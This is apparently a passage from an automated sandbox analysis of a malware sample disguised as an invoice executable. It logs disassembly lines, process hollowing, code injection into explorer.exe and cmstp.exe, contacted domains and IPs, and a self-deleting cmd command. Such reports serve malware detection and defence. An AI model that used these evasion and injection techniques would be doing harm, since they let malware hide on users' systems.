          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04931C06 mov eax, dword ptr fs:[00000030h]8_2_04931C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]8_2_048F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]8_2_048F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7016 mov eax, dword ptr fs:[00000030h]8_2_048F7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]8_2_0494740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]8_2_0494740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494740D mov eax, dword ptr fs:[00000030h]8_2_0494740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]8_2_0488B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]8_2_0488B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]8_2_0488B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488B02A mov eax, dword ptr fs:[00000030h]8_2_0488B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048ABC2C mov eax, dword ptr fs:[00000030h]8_2_048ABC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490C450 mov eax, dword ptr fs:[00000030h]8_2_0490C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490C450 mov eax, dword ptr fs:[00000030h]8_2_0490C450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA44B mov eax, dword ptr fs:[00000030h]8_2_048AA44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04890050 mov eax, dword ptr fs:[00000030h]8_2_04890050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04890050 mov eax, dword ptr fs:[00000030h]8_2_04890050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04932073 mov eax, dword ptr fs:[00000030h]8_2_04932073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04941074 mov eax, dword ptr fs:[00000030h]8_2_04941074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489746D mov eax, dword ptr fs:[00000030h]8_2_0489746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C182 mov eax, dword ptr fs:[00000030h]8_2_0489C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]8_2_04872D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]8_2_04872D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]8_2_04872D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]8_2_04872D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04872D8A mov eax, dword ptr fs:[00000030h]8_2_04872D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA185 mov eax, dword ptr fs:[00000030h]8_2_048AA185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFD9B mov eax, dword ptr fs:[00000030h]8_2_048AFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFD9B mov eax, dword ptr fs:[00000030h]8_2_048AFD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A61A0 mov eax, dword ptr fs:[00000030h]8_2_048A61A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A61A0 mov eax, dword ptr fs:[00000030h]8_2_048A61A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A35A1 mov eax, dword ptr fs:[00000030h]8_2_048A35A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]8_2_048A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]8_2_048A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A1DB5 mov eax, dword ptr fs:[00000030h]8_2_048A1DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04928DF1 mov eax, dword ptr fs:[00000030h]8_2_04928DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]8_2_0487B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]8_2_0487B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B1E1 mov eax, dword ptr fs:[00000030h]8_2_0487B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E0 mov eax, dword ptr fs:[00000030h]8_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488D5E0 mov eax, dword ptr fs:[00000030h]8_2_0488D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_049041E8 mov eax, dword ptr fs:[00000030h]8_2_049041E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]8_2_04879100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]8_2_04879100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879100 mov eax, dword ptr fs:[00000030h]8_2_04879100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948D34 mov eax, dword ptr fs:[00000030h]8_2_04948D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov eax, dword ptr fs:[00000030h]8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04894120 mov ecx, dword ptr fs:[00000030h]8_2_04894120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A513A mov eax, dword ptr fs:[00000030h]8_2_048A513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A513A mov eax, dword ptr fs:[00000030h]8_2_048A513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]8_2_048A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]8_2_048A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A4D3B mov eax, dword ptr fs:[00000030h]8_2_048A4D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487AD30 mov eax, dword ptr fs:[00000030h]8_2_0487AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048FA537 mov eax, dword ptr fs:[00000030h]8_2_048FA537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04883D34 mov eax, dword ptr fs:[00000030h]8_2_04883D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B3D43 mov eax, dword ptr fs:[00000030h]8_2_048B3D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489B944 mov eax, dword ptr fs:[00000030h]8_2_0489B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489B944 mov eax, dword ptr fs:[00000030h]8_2_0489B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F3540 mov eax, dword ptr fs:[00000030h]8_2_048F3540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04897D50 mov eax, dword ptr fs:[00000030h]8_2_04897D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C962 mov eax, dword ptr fs:[00000030h]8_2_0487C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B171 mov eax, dword ptr fs:[00000030h]8_2_0487B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487B171 mov eax, dword ptr fs:[00000030h]8_2_0487B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C577 mov eax, dword ptr fs:[00000030h]8_2_0489C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489C577 mov eax, dword ptr fs:[00000030h]8_2_0489C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FE87 mov eax, dword ptr fs:[00000030h]8_2_0490FE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AD294 mov eax, dword ptr fs:[00000030h]8_2_048AD294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AD294 mov eax, dword ptr fs:[00000030h]8_2_048AD294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]8_2_048752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]8_2_048752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]8_2_048752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]8_2_048752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048752A5 mov eax, dword ptr fs:[00000030h]8_2_048752A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F46A7 mov eax, dword ptr fs:[00000030h]8_2_048F46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]8_2_04940EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]8_2_04940EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04940EA5 mov eax, dword ptr fs:[00000030h]8_2_04940EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]8_2_0488AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488AAB0 mov eax, dword ptr fs:[00000030h]8_2_0488AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AFAB0 mov eax, dword ptr fs:[00000030h]8_2_048AFAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948ED6 mov eax, dword ptr fs:[00000030h]8_2_04948ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A36CC mov eax, dword ptr fs:[00000030h]8_2_048A36CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B8EC7 mov eax, dword ptr fs:[00000030h]8_2_048B8EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FEC0 mov eax, dword ptr fs:[00000030h]8_2_0492FEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A16E0 mov ecx, dword ptr fs:[00000030h]8_2_048A16E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048876E2 mov eax, dword ptr fs:[00000030h]8_2_048876E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888A0A mov eax, dword ptr fs:[00000030h]8_2_04888A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]8_2_0487C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]8_2_0487C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487C600 mov eax, dword ptr fs:[00000030h]8_2_0487C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04893A1C mov eax, dword ptr fs:[00000030h]8_2_04893A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]8_2_048AA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA61C mov eax, dword ptr fs:[00000030h]8_2_048AA61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487E620 mov eax, dword ptr fs:[00000030h]8_2_0487E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492FE3F mov eax, dword ptr fs:[00000030h]8_2_0492FE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]8_2_04879240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]8_2_04879240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]8_2_04879240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04879240 mov eax, dword ptr fs:[00000030h]8_2_04879240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04904257 mov eax, dword ptr fs:[00000030h]8_2_04904257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04887E41 mov eax, dword ptr fs:[00000030h]8_2_04887E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488766D mov eax, dword ptr fs:[00000030h]8_2_0488766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B927A mov eax, dword ptr fs:[00000030h]8_2_048B927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]8_2_0492B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492B260 mov eax, dword ptr fs:[00000030h]8_2_0492B260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948A62 mov eax, dword ptr fs:[00000030h]8_2_04948A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]8_2_0489AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]8_2_0489AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]8_2_0489AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]8_2_0489AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489AE73 mov eax, dword ptr fs:[00000030h]8_2_0489AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]8_2_04881B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04881B8F mov eax, dword ptr fs:[00000030h]8_2_04881B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0492D380 mov ecx, dword ptr fs:[00000030h]8_2_0492D380
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493138A mov eax, dword ptr fs:[00000030h]8_2_0493138A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AB390 mov eax, dword ptr fs:[00000030h]8_2_048AB390
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]8_2_048F7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]8_2_048F7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048F7794 mov eax, dword ptr fs:[00000030h]8_2_048F7794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04888794 mov eax, dword ptr fs:[00000030h]8_2_04888794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04945BA5 mov eax, dword ptr fs:[00000030h]8_2_04945BA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048B37F5 mov eax, dword ptr fs:[00000030h]8_2_048B37F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]8_2_0490FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0490FF10 mov eax, dword ptr fs:[00000030h]8_2_0490FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]8_2_048AA70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AA70E mov eax, dword ptr fs:[00000030h]8_2_048AA70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0493131B mov eax, dword ptr fs:[00000030h]8_2_0493131B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]8_2_0494070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0494070D mov eax, dword ptr fs:[00000030h]8_2_0494070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0489F716 mov eax, dword ptr fs:[00000030h]8_2_0489F716
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]8_2_04874F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04874F2E mov eax, dword ptr fs:[00000030h]8_2_04874F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048AE730 mov eax, dword ptr fs:[00000030h]8_2_048AE730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB40 mov eax, dword ptr fs:[00000030h]8_2_0487DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488EF40 mov eax, dword ptr fs:[00000030h]8_2_0488EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948B58 mov eax, dword ptr fs:[00000030h]8_2_04948B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487F358 mov eax, dword ptr fs:[00000030h]8_2_0487F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0487DB60 mov ecx, dword ptr fs:[00000030h]8_2_0487DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_0488FF60 mov eax, dword ptr fs:[00000030h]8_2_0488FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]8_2_048A3B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_048A3B7A mov eax, dword ptr fs:[00000030h]8_2_048A3B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 8_2_04948F6A mov eax, dword ptr fs:[00000030h]8_2_04948F6A
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_00409B40 LdrLoadDll,2_2_00409B40
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.161.86.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.165 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ratqueen.art
          Source: C:\Windows\explorer.exeDomain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exeDomain query: www.yuezhong66.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 350000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeMemory written: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeProcess created: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.770612418.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.751676552.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.780087386.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Users\user\Desktop\EXPORT INVOICE 2021.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
